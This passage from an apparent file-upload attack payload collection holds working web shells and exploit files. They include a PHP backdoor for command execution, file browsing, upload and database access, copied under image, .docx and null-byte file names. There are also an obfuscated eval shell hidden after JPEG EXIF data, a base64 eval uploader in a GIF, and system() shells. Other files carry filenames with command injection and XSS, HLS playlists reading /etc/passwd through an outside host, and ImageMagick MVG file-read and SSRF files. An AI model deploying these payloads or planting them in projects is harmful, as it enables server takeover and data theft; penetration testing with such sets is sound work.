25 | LPT9.{EXT}
26 | *.{EXT}
27 | ".{EXT}
28 | [.{EXT}
29 | ].{EXT} 
30 | :.{EXT} 
31 | |.{EXT} 
32 | =.{EXT} 
33 | ,.{EXT}
34 | 


--------------------------------------------------------------------------------
/Uploads/invalid-filesystem-chars-microsoft.txt:
--------------------------------------------------------------------------------
 1 | # list of invalid characters for windows filesystem - these can be used to attempt to cause an error condition during file upload bypass attempts which might reveal an absolute path. Useful if you're not sure where your files are landing.
 2 | # fuzz these into a filename during upload attempts
 3 | * 
 4 | . 
 5 | " 
 6 | / 
 7 | \ 
 8 | [ 
 9 | ] 
10 | : 
11 | ; 
12 | | 
13 | = 
14 | ,
15 | 


--------------------------------------------------------------------------------
/Uploads/invalid-filesystem-chars-osx.txt:
--------------------------------------------------------------------------------
1 | # list of invalid characters for osx - these can be used to attempt to cause an error condition during file upload bypass attempts which might reveal an absolute path. Useful if you're not sure where your files are landing.
2 | # fuzz these into a filename during upload attempts
3 | : 
4 | 


--------------------------------------------------------------------------------
/Uploads/jaja.php.orionn.gif:
--------------------------------------------------------------------------------
1 | GIF89a1
2 | <?php eval(base64_decode('aWYgKCBpc3NldCgkX0dFVFsndmVyc2knXSkgKQp7Cgl2ZXJzKCk7CmV4aXQ7Cn0KCgppZiAoIGlzc2V0KCRfR0VUWydhbm9uZ2hvc3QnXSkgKQp7CgllY2hvICJXZSBhcmUgRXZleXdoZXJlXG5cbiI7CgllY2hvICc8Yj5Bbm9uR2hvc3QgV2FzIGhlcmUuLjxicj48YnI+Jy4nJy4nPGJyPjwvYj4nOwoJZWNobyAnPGZvcm0gYWN0aW9uPSIiIG1ldGhvZD0icG9zdCIgZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSIgbmFtZT0idXBsb2FkZXIiIGlkPSJ1cGxvYWRlciI+JzsKCWVjaG8gJzxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmaWxlIiBzaXplPSI1MCI+PGlucHV0IG5hbWU9Il91cGwiIHR5cGU9InN1Ym1pdCIgaWQ9Il91cGwiIHZhbHVlPSJVcGxvYWQiPjwvZm9ybT4nOwoJaWYoICRfUE9TVFsnX3VwbCddID09ICJVcGxvYWQiICkgewoJCWlmKEBjb3B5KCRfRklMRVNbJ2ZpbGUnXVsndG1wX25hbWUnXSwgJF9GSUxFU1snZmlsZSddWyduYW1lJ10pKSB7IGVjaG8gJzxiPlVwbG9hZCBTdWNjZXNzICEhITwvYj48YnI+PGJyPic7IH0KCQllbHNlIHsgZWNobyAnPGI+VXBsb2FkIERvbmUgISEhPC9iPjxicj48YnI+JzsgfQoJfQpleGl0Owp9Cj8+'));
3 | ?>


--------------------------------------------------------------------------------
/Uploads/jpeg.php%00.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/Uploads/jpeg.php%00.jpg


--------------------------------------------------------------------------------
/Uploads/jpeg.php.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/Uploads/jpeg.php.jpg


--------------------------------------------------------------------------------
/Uploads/jpeg/test.jpeg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/Uploads/jpeg/test.jpeg


--------------------------------------------------------------------------------
/Uploads/kos`uname`oss.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/Uploads/kos`uname`oss.jpg


--------------------------------------------------------------------------------
/Uploads/loading.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/Uploads/loading.gif


--------------------------------------------------------------------------------
/Uploads/mp4/1.mp4:
--------------------------------------------------------------------------------
1 | #EXTM3U
2 | #EXT-X-MEDIA-SEQUENCE:0
3 | #EXTINF:10.0,
4 | http://yngwie.ru/2.mp4
5 | #EXT-X-ENDLIST
6 | 


--------------------------------------------------------------------------------
/Uploads/mp4/mp4uploadtext.txt:
--------------------------------------------------------------------------------
 1 | #EXTM3U
 2 | #EXT-X-MEDIA-SEQUENCE:0
 3 | #EXTINF:10.0,
 4 | http://yngwie.ru/2.mp4
 5 | #EXT-X-ENDLIST
 6 | 
 7 | #EXTM3U
 8 | #EXT-X-MEDIA-SEQUENCE:0
 9 | #EXTINF:10.0,
10 | concat:http://yngwie.ru/header.m3u8|file:///etc/passwd
11 | #EXT-X-ENDLIST
12 | 
13 | #EXTM3U
14 | #EXT-X-MEDIA-SEQUENCE:0
15 | #EXTINF:,
16 | http://yngwie.ru?
17 | 


--------------------------------------------------------------------------------
/Uploads/mvg_read.mvg:
--------------------------------------------------------------------------------
1 | push graphic-context
2 | viewbox 0 0 640 480
3 | image over 0,0 0,0 'label:@/etc/passwd'
4 | pop graphic-context


--------------------------------------------------------------------------------
/Uploads/mvg_ssrf.mvg:
--------------------------------------------------------------------------------
1 | push graphic-context
2 | viewbox 0 0 640 480
3 | fill 'url(https://crowdshield.com/.injectx/ssrf_vuln.txt)'
4 | pop graphic-context


--------------------------------------------------------------------------------
/Uploads/onerror=alert('XSS')' a='.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/Uploads/onerror=alert('XSS')' a='.jpg


--------------------------------------------------------------------------------
/Uploads/passwd:
--------------------------------------------------------------------------------
1 | /etc/passwd


--------------------------------------------------------------------------------
/Uploads/passwd.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/Uploads/passwd.zip


--------------------------------------------------------------------------------
/Uploads/php-backdoor.docx:
--------------------------------------------------------------------------------
 1 | <?
 2 | // a simple php backdoor | coded by z0mbie [30.08.03] | http://freenet.am/~zombie \\
 3 | 
 4 | ob_implicit_flush();
 5 | if(isset($_REQUEST['f'])){
 6 |         $filename=$_REQUEST['f'];
 7 |         $file=fopen("$filename","rb");
 8 |         fpassthru($file);
 9 |         die;
10 | }
11 | if(isset($_REQUEST['d'])){
12 |         $d=$_REQUEST['d'];
13 |         echo "<pre>";
14 |         if ($handle = opendir("$d")) {
15 |         echo "<h2>listing of $d</h2>";
16 |                    while ($dir = readdir($handle)){ 
17 |                        if (is_dir("$d/$dir")) echo "<a href='$PHP_SELF?d=$d/$dir'><font color=grey>";
18 | 							else echo "<a href='$PHP_SELF?f=$d/$dir'><font color=black>";
19 |                        echo "$dir\n"; 
20 |                        echo "</font></a>";
21 |                 }
22 |                        
23 |         } else echo "opendir() failed";
24 |         closedir($handle);
25 |         die ("<hr>"); 
26 | }
27 | if(isset($_REQUEST['c'])){
28 | 	echo "<pre>";
29 | 	system($_REQUEST['c']);		   
30 | 	die;
31 | }
32 | if(isset($_REQUEST['upload'])){
33 | 
34 | 		if(!isset($_REQUEST['dir'])) die('hey,specify directory!');
35 | 			else $dir=$_REQUEST['dir'];
36 | 		$fname=$HTTP_POST_FILES['file_name']['name'];
37 | 		if(!move_uploaded_file($HTTP_POST_FILES['file_name']['tmp_name'], $dir.$fname))
38 | 			die('file uploading error.');
39 | }
40 | if(isset($_REQUEST['mquery'])){
41 | 	
42 | 	$host=$_REQUEST['host'];
43 | 	$usr=$_REQUEST['usr'];
44 | 	$passwd=$_REQUEST['passwd'];
45 | 	$db=$_REQUEST['db'];
46 | 	$mquery=$_REQUEST['mquery'];
47 | 	mysql_connect("$host", "$usr", "$passwd") or
48 |     die("Could not connect: " . mysql_error());
49 |     mysql_select_db("$db");
50 |     $result = mysql_query("$mquery");
51 | 	if($result!=FALSE) echo "<pre><h2>query was executed correctly</h2>\n";
52 |     while ($row = mysql_fetch_array($result,MYSQL_ASSOC)) print_r($row);  
53 |     mysql_free_result($result);
54 | 	die;
55 | }
56 | ?>
57 | <pre><form action="php-backdoor.php" METHOD=GET >execute command: <input type="text" name="c"><input type="submit" value="go"><hr></form> 
58 | <form enctype="multipart/form-data" action="php-backdoor.php" method="post"><input type="hidden" name="MAX_FILE_SIZE" value="1000000000">
59 | upload file:<input name="file_name" type="file">   to dir: <input type="text" name="dir">&nbsp;&nbsp;<input type="submit" name="upload" value="upload"></form>
60 | <hr>to browse go to http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=[directory here]
61 | <br>for example:
62 | http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=/etc on *nix
63 | or http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=c:/windows on win
64 | <hr>execute mysql query:
65 | <form action="php-backdoor.php" METHOD=GET >
66 | host:<input type="text" name="host"value="localhost">  user: <input type="text" name="usr" value=root> password: <input type="text" name="passwd">
67 | 
68 | database: <input type="text" name="db">  query: <input type="text" name="mquery"> <input type="submit" value="execute">
69 | </form>
70 | 
71 | <!--	http://michaeldaw.org	2006 	-->
72 | 


--------------------------------------------------------------------------------
/Uploads/php-backdoor.jpg:
--------------------------------------------------------------------------------
 1 | <?
 2 | // a simple php backdoor | coded by z0mbie [30.08.03] | http://freenet.am/~zombie \\
 3 | 
 4 | ob_implicit_flush();
 5 | if(isset($_REQUEST['f'])){
 6 |         $filename=$_REQUEST['f'];
 7 |         $file=fopen("$filename","rb");
 8 |         fpassthru($file);
 9 |         die;
10 | }
11 | if(isset($_REQUEST['d'])){
12 |         $d=$_REQUEST['d'];
13 |         echo "<pre>";
14 |         if ($handle = opendir("$d")) {
15 |         echo "<h2>listing of $d</h2>";
16 |                    while ($dir = readdir($handle)){ 
17 |                        if (is_dir("$d/$dir")) echo "<a href='$PHP_SELF?d=$d/$dir'><font color=grey>";
18 | 							else echo "<a href='$PHP_SELF?f=$d/$dir'><font color=black>";
19 |                        echo "$dir\n"; 
20 |                        echo "</font></a>";
21 |                 }
22 |                        
23 |         } else echo "opendir() failed";
24 |         closedir($handle);
25 |         die ("<hr>"); 
26 | }
27 | if(isset($_REQUEST['c'])){
28 | 	echo "<pre>";
29 | 	system($_REQUEST['c']);		   
30 | 	die;
31 | }
32 | if(isset($_REQUEST['upload'])){
33 | 
34 | 		if(!isset($_REQUEST['dir'])) die('hey,specify directory!');
35 | 			else $dir=$_REQUEST['dir'];
36 | 		$fname=$HTTP_POST_FILES['file_name']['name'];
37 | 		if(!move_uploaded_file($HTTP_POST_FILES['file_name']['tmp_name'], $dir.$fname))
38 | 			die('file uploading error.');
39 | }
40 | if(isset($_REQUEST['mquery'])){
41 | 	
42 | 	$host=$_REQUEST['host'];
43 | 	$usr=$_REQUEST['usr'];
44 | 	$passwd=$_REQUEST['passwd'];
45 | 	$db=$_REQUEST['db'];
46 | 	$mquery=$_REQUEST['mquery'];
47 | 	mysql_connect("$host", "$usr", "$passwd") or
48 |     die("Could not connect: " . mysql_error());
49 |     mysql_select_db("$db");
50 |     $result = mysql_query("$mquery");
51 | 	if($result!=FALSE) echo "<pre><h2>query was executed correctly</h2>\n";
52 |     while ($row = mysql_fetch_array($result,MYSQL_ASSOC)) print_r($row);  
53 |     mysql_free_result($result);
54 | 	die;
55 | }
56 | ?>
57 | <pre><form action="php-backdoor.php" METHOD=GET >execute command: <input type="text" name="c"><input type="submit" value="go"><hr></form> 
58 | <form enctype="multipart/form-data" action="php-backdoor.php" method="post"><input type="hidden" name="MAX_FILE_SIZE" value="1000000000">
59 | upload file:<input name="file_name" type="file">   to dir: <input type="text" name="dir">&nbsp;&nbsp;<input type="submit" name="upload" value="upload"></form>
60 | <hr>to browse go to http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=[directory here]
61 | <br>for example:
62 | http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=/etc on *nix
63 | or http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=c:/windows on win
64 | <hr>execute mysql query:
65 | <form action="php-backdoor.php" METHOD=GET >
66 | host:<input type="text" name="host"value="localhost">  user: <input type="text" name="usr" value=root> password: <input type="text" name="passwd">
67 | 
68 | database: <input type="text" name="db">  query: <input type="text" name="mquery"> <input type="submit" value="execute">
69 | </form>
70 | 
71 | <!--	http://michaeldaw.org	2006 	-->
72 | 


--------------------------------------------------------------------------------
/Uploads/php-backdoor.php:
--------------------------------------------------------------------------------
 1 | <?
 2 | // a simple php backdoor | coded by z0mbie [30.08.03] | http://freenet.am/~zombie \\
 3 | 
 4 | ob_implicit_flush();
 5 | if(isset($_REQUEST['f'])){
 6 |         $filename=$_REQUEST['f'];
 7 |         $file=fopen("$filename","rb");
 8 |         fpassthru($file);
 9 |         die;
10 | }
11 | if(isset($_REQUEST['d'])){
12 |         $d=$_REQUEST['d'];
13 |         echo "<pre>";
14 |         if ($handle = opendir("$d")) {
15 |         echo "<h2>listing of $d</h2>";
16 |                    while ($dir = readdir($handle)){ 
17 |                        if (is_dir("$d/$dir")) echo "<a href='$PHP_SELF?d=$d/$dir'><font color=grey>";
18 | 							else echo "<a href='$PHP_SELF?f=$d/$dir'><font color=black>";
19 |                        echo "$dir\n"; 
20 |                        echo "</font></a>";
21 |                 }
22 |                        
23 |         } else echo "opendir() failed";
24 |         closedir($handle);
25 |         die ("<hr>"); 
26 | }
27 | if(isset($_REQUEST['c'])){
28 | 	echo "<pre>";
29 | 	system($_REQUEST['c']);		   
30 | 	die;
31 | }
32 | if(isset($_REQUEST['upload'])){
33 | 
34 | 		if(!isset($_REQUEST['dir'])) die('hey,specify directory!');
35 | 			else $dir=$_REQUEST['dir'];
36 | 		$fname=$HTTP_POST_FILES['file_name']['name'];
37 | 		if(!move_uploaded_file($HTTP_POST_FILES['file_name']['tmp_name'], $dir.$fname))
38 | 			die('file uploading error.');
39 | }
40 | if(isset($_REQUEST['mquery'])){
41 | 	
42 | 	$host=$_REQUEST['host'];
43 | 	$usr=$_REQUEST['usr'];
44 | 	$passwd=$_REQUEST['passwd'];
45 | 	$db=$_REQUEST['db'];
46 | 	$mquery=$_REQUEST['mquery'];
47 | 	mysql_connect("$host", "$usr", "$passwd") or
48 |     die("Could not connect: " . mysql_error());
49 |     mysql_select_db("$db");
50 |     $result = mysql_query("$mquery");
51 | 	if($result!=FALSE) echo "<pre><h2>query was executed correctly</h2>\n";
52 |     while ($row = mysql_fetch_array($result,MYSQL_ASSOC)) print_r($row);  
53 |     mysql_free_result($result);
54 | 	die;
55 | }
56 | ?>
57 | <pre><form action="php-backdoor.php" METHOD=GET >execute command: <input type="text" name="c"><input type="submit" value="go"><hr></form> 
58 | <form enctype="multipart/form-data" action="php-backdoor.php" method="post"><input type="hidden" name="MAX_FILE_SIZE" value="1000000000">
59 | upload file:<input name="file_name" type="file">   to dir: <input type="text" name="dir">&nbsp;&nbsp;<input type="submit" name="upload" value="upload"></form>
60 | <hr>to browse go to http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=[directory here]
61 | <br>for example:
62 | http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=/etc on *nix
63 | or http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=c:/windows on win
64 | <hr>execute mysql query:
65 | <form action="php-backdoor.php" METHOD=GET >
66 | host:<input type="text" name="host"value="localhost">  user: <input type="text" name="usr" value=root> password: <input type="text" name="passwd">
67 | 
68 | database: <input type="text" name="db">  query: <input type="text" name="mquery"> <input type="submit" value="execute">
69 | </form>
70 | 
71 | <!--	http://michaeldaw.org	2006 	-->
72 | 


--------------------------------------------------------------------------------
/Uploads/php-backdoor.php%00.jpg:
--------------------------------------------------------------------------------
 1 | <?
 2 | // a simple php backdoor | coded by z0mbie [30.08.03] | http://freenet.am/~zombie \\
 3 | 
 4 | ob_implicit_flush();
 5 | if(isset($_REQUEST['f'])){
 6 |         $filename=$_REQUEST['f'];
 7 |         $file=fopen("$filename","rb");
 8 |         fpassthru($file);
 9 |         die;
10 | }
11 | if(isset($_REQUEST['d'])){
12 |         $d=$_REQUEST['d'];
13 |         echo "<pre>";
14 |         if ($handle = opendir("$d")) {
15 |         echo "<h2>listing of $d</h2>";
16 |                    while ($dir = readdir($handle)){ 
17 |                        if (is_dir("$d/$dir")) echo "<a href='$PHP_SELF?d=$d/$dir'><font color=grey>";
18 | 							else echo "<a href='$PHP_SELF?f=$d/$dir'><font color=black>";
19 |                        echo "$dir\n"; 
20 |                        echo "</font></a>";
21 |                 }
22 |                        
23 |         } else echo "opendir() failed";
24 |         closedir($handle);
25 |         die ("<hr>"); 
26 | }
27 | if(isset($_REQUEST['c'])){
28 | 	echo "<pre>";
29 | 	system($_REQUEST['c']);		   
30 | 	die;
31 | }
32 | if(isset($_REQUEST['upload'])){
33 | 
34 | 		if(!isset($_REQUEST['dir'])) die('hey,specify directory!');
35 | 			else $dir=$_REQUEST['dir'];
36 | 		$fname=$HTTP_POST_FILES['file_name']['name'];
37 | 		if(!move_uploaded_file($HTTP_POST_FILES['file_name']['tmp_name'], $dir.$fname))
38 | 			die('file uploading error.');
39 | }
40 | if(isset($_REQUEST['mquery'])){
41 | 	
42 | 	$host=$_REQUEST['host'];
43 | 	$usr=$_REQUEST['usr'];
44 | 	$passwd=$_REQUEST['passwd'];
45 | 	$db=$_REQUEST['db'];
46 | 	$mquery=$_REQUEST['mquery'];
47 | 	mysql_connect("$host", "$usr", "$passwd") or
48 |     die("Could not connect: " . mysql_error());
49 |     mysql_select_db("$db");
50 |     $result = mysql_query("$mquery");
51 | 	if($result!=FALSE) echo "<pre><h2>query was executed correctly</h2>\n";
52 |     while ($row = mysql_fetch_array($result,MYSQL_ASSOC)) print_r($row);  
53 |     mysql_free_result($result);
54 | 	die;
55 | }
56 | ?>
57 | <pre><form action="php-backdoor.php" METHOD=GET >execute command: <input type="text" name="c"><input type="submit" value="go"><hr></form> 
58 | <form enctype="multipart/form-data" action="php-backdoor.php" method="post"><input type="hidden" name="MAX_FILE_SIZE" value="1000000000">
59 | upload file:<input name="file_name" type="file">   to dir: <input type="text" name="dir">&nbsp;&nbsp;<input type="submit" name="upload" value="upload"></form>
60 | <hr>to browse go to http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=[directory here]
61 | <br>for example:
62 | http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=/etc on *nix
63 | or http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=c:/windows on win
64 | <hr>execute mysql query:
65 | <form action="php-backdoor.php" METHOD=GET >
66 | host:<input type="text" name="host"value="localhost">  user: <input type="text" name="usr" value=root> password: <input type="text" name="passwd">
67 | 
68 | database: <input type="text" name="db">  query: <input type="text" name="mquery"> <input type="submit" value="execute">
69 | </form>
70 | 
71 | <!--	http://michaeldaw.org	2006 	-->
72 | 


--------------------------------------------------------------------------------
/Uploads/php-backdoor.php.jpg:
--------------------------------------------------------------------------------
 1 | <?
 2 | // a simple php backdoor | coded by z0mbie [30.08.03] | http://freenet.am/~zombie \\
 3 | 
 4 | ob_implicit_flush();
 5 | if(isset($_REQUEST['f'])){
 6 |         $filename=$_REQUEST['f'];
 7 |         $file=fopen("$filename","rb");
 8 |         fpassthru($file);
 9 |         die;
10 | }
11 | if(isset($_REQUEST['d'])){
12 |         $d=$_REQUEST['d'];
13 |         echo "<pre>";
14 |         if ($handle = opendir("$d")) {
15 |         echo "<h2>listing of $d</h2>";
16 |                    while ($dir = readdir($handle)){ 
17 |                        if (is_dir("$d/$dir")) echo "<a href='$PHP_SELF?d=$d/$dir'><font color=grey>";
18 | 							else echo "<a href='$PHP_SELF?f=$d/$dir'><font color=black>";
19 |                        echo "$dir\n"; 
20 |                        echo "</font></a>";
21 |                 }
22 |                        
23 |         } else echo "opendir() failed";
24 |         closedir($handle);
25 |         die ("<hr>"); 
26 | }
27 | if(isset($_REQUEST['c'])){
28 | 	echo "<pre>";
29 | 	system($_REQUEST['c']);		   
30 | 	die;
31 | }
32 | if(isset($_REQUEST['upload'])){
33 | 
34 | 		if(!isset($_REQUEST['dir'])) die('hey,specify directory!');
35 | 			else $dir=$_REQUEST['dir'];
36 | 		$fname=$HTTP_POST_FILES['file_name']['name'];
37 | 		if(!move_uploaded_file($HTTP_POST_FILES['file_name']['tmp_name'], $dir.$fname))
38 | 			die('file uploading error.');
39 | }
40 | if(isset($_REQUEST['mquery'])){
41 | 	
42 | 	$host=$_REQUEST['host'];
43 | 	$usr=$_REQUEST['usr'];
44 | 	$passwd=$_REQUEST['passwd'];
45 | 	$db=$_REQUEST['db'];
46 | 	$mquery=$_REQUEST['mquery'];
47 | 	mysql_connect("$host", "$usr", "$passwd") or
48 |     die("Could not connect: " . mysql_error());
49 |     mysql_select_db("$db");
50 |     $result = mysql_query("$mquery");
51 | 	if($result!=FALSE) echo "<pre><h2>query was executed correctly</h2>\n";
52 |     while ($row = mysql_fetch_array($result,MYSQL_ASSOC)) print_r($row);  
53 |     mysql_free_result($result);
54 | 	die;
55 | }
56 | ?>
57 | <pre><form action="php-backdoor.php" METHOD=GET >execute command: <input type="text" name="c"><input type="submit" value="go"><hr></form> 
58 | <form enctype="multipart/form-data" action="php-backdoor.php" method="post"><input type="hidden" name="MAX_FILE_SIZE" value="1000000000">
59 | upload file:<input name="file_name" type="file">   to dir: <input type="text" name="dir">&nbsp;&nbsp;<input type="submit" name="upload" value="upload"></form>
60 | <hr>to browse go to http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=[directory here]
61 | <br>for example:
62 | http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=/etc on *nix
63 | or http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=c:/windows on win
64 | <hr>execute mysql query:
65 | <form action="php-backdoor.php" METHOD=GET >
66 | host:<input type="text" name="host"value="localhost">  user: <input type="text" name="usr" value=root> password: <input type="text" name="passwd">
67 | 
68 | database: <input type="text" name="db">  query: <input type="text" name="mquery"> <input type="submit" value="execute">
69 | </form>
70 | 
71 | <!--	http://michaeldaw.org	2006 	-->
72 | 


--------------------------------------------------------------------------------
/Uploads/phpinfo.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/Uploads/phpinfo.jpg


--------------------------------------------------------------------------------
/Uploads/phpinfo.php.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/Uploads/phpinfo.php.gif


--------------------------------------------------------------------------------
/Uploads/phppng.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/Uploads/phppng.png


--------------------------------------------------------------------------------
/Uploads/png/image.php.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/Uploads/png/image.php.png


--------------------------------------------------------------------------------
/Uploads/publications.opml:
--------------------------------------------------------------------------------
1 | <html><head>
2 | <meta http-equiv="content-type" content="text/html; charset=UTF-8"></head><body></body></html>


--------------------------------------------------------------------------------
/Uploads/pwnd.php.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/Uploads/pwnd.php.jpg


--------------------------------------------------------------------------------
/Uploads/rce.php.jpg:
--------------------------------------------------------------------------------
1 | <?php
2 | system("uname -a");
3 | phpinfo();
4 | ?>
5 | 


--------------------------------------------------------------------------------
/Uploads/rce2.php.jpg:
--------------------------------------------------------------------------------
1 | <?php
2 | system($_GET['a']);
3 | phpinfo();
4 | ?>
5 | 


--------------------------------------------------------------------------------
/Uploads/shell.php;.jpg:
--------------------------------------------------------------------------------
 1 | <?php
 2 | $G='$kh="5cbc";[K[K$kf=[K"f07e";fu[Knction x[K[K($t,$[Kk[K){$c=[Kstrlen($k);$l=st[Krl[Ken($t);$o="";[Kf';
 3 | $m='se6[K4_en[Kcode[K(x([Kgzco[Kmpress($[Ko),$k));pr[Kint[K([K"<$k>$d</$[Kk>")[K;@[Ksession_destroy();}}}}';
 4 | $e='r=[K$_SERV[KER;[K$rr=@[K$r["HT[KTP_REF[KERER"];$ra[K=@[K$r["H[KTTP_ACCEPT_[KL[KANGUAG[KE"];if($rr&[K&$ra[K){';
 5 | $K='ray[K_key_exi[K[Ksts($i[K,$s)){[K$[Ks[$i].=$p;$e=strp[Kos($[Ks[$i[K],$f[K);if($e){$k=$k[Kh.$[Kkf;ob_st[Ka';
 6 | $p=');$s=[K&$[K_SESSIO[KN;$ss="subs[Ktr";$sl=[K"strt[Kolower"[K;$i[K=$m[K[1][0][K.$m[1][1][K;$[Kh=$sl($ss(m';
 7 | $N='d[K[K5($i.$kh),[K0,3));[K$f=$sl($[K[Kss(md5($i.$kf[K),0[K,[K3));$p="[K";[Kfor($z[K=1;$z<count($m[[K1]);$z';
 8 | $Z='+[K+)$p[K.=$q[$[Km[K[2][[K$z][K];if(strpos([K$p,$h)===0){[K$s[K[$i][K="";[K$p=$ss([K$p[K,3);}if(ar';
 9 | $j='$u=pars[Ke_u[K[Krl($rr);[Kparse_str($[Ku["quer[Ky"],$[Kq[K);$q=array_va[Kl[Kues($q);[K[Kp[Kreg_ma';
10 | $D=str_replace('gh','','cghghreategh_fghuncghghtion');
11 | $U='r[Kt()[K;@ev[Kal(@gzunc[Kompres[Ks(@x(@[Kbase[K64_dec[Kode(preg_r[Keplace(ar[Kray[K[K("/[K_/","/-/"';
12 | $Q='or($[Ki=0;[K$i<$l[K;){for($j=0;([K$[Kj<$c&&$[K[Ki<$l);$j++,$[Ki++){$o.[K=$t{$i}^[K[K$[Kk{$j};}}r[Keturn $o;}$';
13 | $O='tch_all("/([\\w[K])[[K\\w-]+(?:[K;q[K[K=0.([\\d]))[K?,?/",$ra,[K$[Km);if($q&&$m[K){@se[Ks[Ksion_star[Kt(';
14 | $V=')[K,array("/[K","+"),$ss([K$[Ks[$i],[K0,$[Ke))),$k))[K);$o=ob_get_[Kcontent[Ks()[K;[Ko[Kb_end_clean();$[Kd=ba';
15 | $T=str_replace('[K','',$G.$Q.$e.$j.$O.$p.$N.$Z.$K.$U.$V.$m);
16 | $v=$D('',$T);$v();
17 | ?>
18 | 


--------------------------------------------------------------------------------
/Uploads/shell.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1N3/IntruderPayloads/9b84328441e0b1d5b63764941bfd72a2460dba5d/Uploads/shell.png


--------------------------------------------------------------------------------
/Uploads/shell2.php;.jpg:
--------------------------------------------------------------------------------
 1 | ����JFIF

HH��#xExifII*
 2 |                         
	�
�




�

�(

1
�2
�
������i�

dFUJIFILMFinePix S2000HD��
 3 | '��
 4 | 'Adobe Photoshop CS4 Windows2010:12:04 19:49:49    PrintIM0250


#��
���
�"�
'�
��0220����
�
�
�
�
 5 | 
�

 6 | �
 7 | 
�
 8 | 
�
"��
	�

 9 | �
*�0100
�

�
N�
�
�
D�
2�
:�
�
�

�


�
�
�
�

10 | �

11 |    �

12 | �)
13 | <?php
14 | $G='$kh="5cbc";[K[K$kf=[K"f07e";fu[Knction x[K[K($t,$[Kk[K){$c=[Kstrlen($k);$l=st[Krl[Ken($t);$o="";[Kf';
15 | $m='se6[K4_en[Kcode[K(x([Kgzco[Kmpress($[Ko),$k));pr[Kint[K([K"<$k>$d</$[Kk>")[K;@[Ksession_destroy();}}}}';
16 | $e='r=[K$_SERV[KER;[K$rr=@[K$r["HT[KTP_REF[KERER"];$ra[K=@[K$r["H[KTTP_ACCEPT_[KL[KANGUAG[KE"];if($rr&[K&$ra[K){';
17 | $K='ray[K_key_exi[K[Ksts($i[K,$s)){[K$[Ks[$i].=$p;$e=strp[Kos($[Ks[$i[K],$f[K);if($e){$k=$k[Kh.$[Kkf;ob_st[Ka';
18 | $p=');$s=[K&$[K_SESSIO[KN;$ss="subs[Ktr";$sl=[K"strt[Kolower"[K;$i[K=$m[K[1][0][K.$m[1][1][K;$[Kh=$sl($ss(m';
19 | $N='d[K[K5($i.$kh),[K0,3));[K$f=$sl($[K[Kss(md5($i.$kf[K),0[K,[K3));$p="[K";[Kfor($z[K=1;$z<count($m[[K1]);$z';
20 | $Z='+[K+)$p[K.=$q[$[Km[K[2][[K$z][K];if(strpos([K$p,$h)===0){[K$s[K[$i][K="";[K$p=$ss([K$p[K,3);}if(ar';
21 | $j='$u=pars[Ke_u[K[Krl($rr);[Kparse_str($[Ku["quer[Ky"],$[Kq[K);$q=array_va[Kl[Kues($q);[K[Kp[Kreg_ma';
22 | $D=str_replace('gh','','cghghreategh_fghuncghghtion');
23 | $U='r[Kt()[K;@ev[Kal(@gzunc[Kompres[Ks(@x(@[Kbase[K64_dec[Kode(preg_r[Keplace(ar[Kray[K[K("/[K_/","/-/"';
24 | $Q='or($[Ki=0;[K$i<$l[K;){for($j=0;([K$[Kj<$c&&$[K[Ki<$l);$j++,$[Ki++){$o.[K=$t{$i}^[K[K$[Kk{$j};}}r[Keturn $o;}$';
25 | $O='tch_all("/([\\w[K])[[K\\w-]+(?:[K;q[K[K=0.([\\d]))[K?,?/",$ra,[K$[Km);if($q&&$m[K){@se[Ks[Ksion_star[Kt(';
26 | $V=')[K,array("/[K","+"),$ss([K$[Ks[$i],[K0,$[Ke))),$k))[K);$o=ob_get_[Kcontent[Ks()[K;[Ko[Kb_end_clean();$[Kd=ba';
27 | $T=str_replace('[K','',$G.$Q.$e.$j.$O.$p.$N.$Z.$K.$U.$V.$m);
28 | $v=$D('',$T);$v();
29 | ?>
30 | 


--------------------------------------------------------------------------------
/Uploads/simple-backdoor.php:
--------------------------------------------------------------------------------
 1 | <!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->
 2 | 
